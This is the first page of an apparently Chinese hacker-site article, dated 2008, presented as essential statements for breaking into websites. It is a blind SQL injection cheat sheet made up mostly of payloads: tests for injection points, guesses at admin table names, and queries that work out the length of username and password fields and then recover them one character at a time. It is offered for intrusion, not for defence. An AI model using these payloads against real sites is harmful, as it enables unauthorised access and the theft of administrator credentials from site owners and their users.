黑客风云——风云网络
设为首页 加入收藏 我要投稿 网站地图
您现在的位置: 黑客风云 >> 黑客文章 >> 黑客入门 >> 黑客常识 >> 文章正文
[推荐]入侵网站必备经典语句
      ★★★★★
入侵网站必备经典语句
文章整理发布:黑客风云 文章来源:www.05112.com 更新时间:2008-1-17

.判断有无注入点

  ; and 1=1 and 1=2

  2.猜表一般的表的名称无非是admin adminuser user pass

  password 等..

  and 0(select count(*) from *)

  and 0(select

  count(*) from admin) ---判断是否存在admin这张表

  3.猜帐号数目 如果遇到00)--

  and 1=(select

  count(*) from admin where len(用户字段名称name)>0)

  and 1=(select count(*) from

  admin where len(_blank>密码字段名称password)>0)

  5.猜解各个字段的长度

  猜解长度就是把>0变换 直到返回正确页面为止

  and 1=(select count(*) from admin where

  len(*)>0)

  and 1=(select count(*) from admin where len(name)>6) 错误

  and 1=(select count(*) from admin where len(name)>5) 正确 长度是6

  and

  1=(select count(*) from admin where len(name)=6) 正确

  and 1=(select

  count(*) from admin where len(password)>11) 正确

  and 1=(select count(*)

  from admin where len(password)>12) 错误 长度是12

  and 1=(select count(*) from

  admin where len(password)=12) 正确

  6.猜解字符

  and 1=(select count(*) from

  admin where left(name,1)=a) ---猜解用户帐号的第一位

  and 1= (select count(*) from admin

  where left(name,2)=ab)---猜解用户帐号的第二位

  就这样一次加一个字符这样猜,猜到够你刚才猜出来的多少位了就对了,帐号就算出来了

  and 1=(select top 1 count(*) from Admin where Asc(mid (pass,5,1))=51) --

[1] [2] [3] [4] 下一页  

文章录入:cainiaowang    责任编辑:cainiaowang 
  • 上一篇文章:

  • 下一篇文章: 没有了
  • 【字体: 】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
    VIP 专 区
    Copyright @2006 黑客风云 ●业务联系:QQ 联系怪人 联系奇人 Email:给怪人发邮件 给奇人发邮件
    ICP备案:冀06009886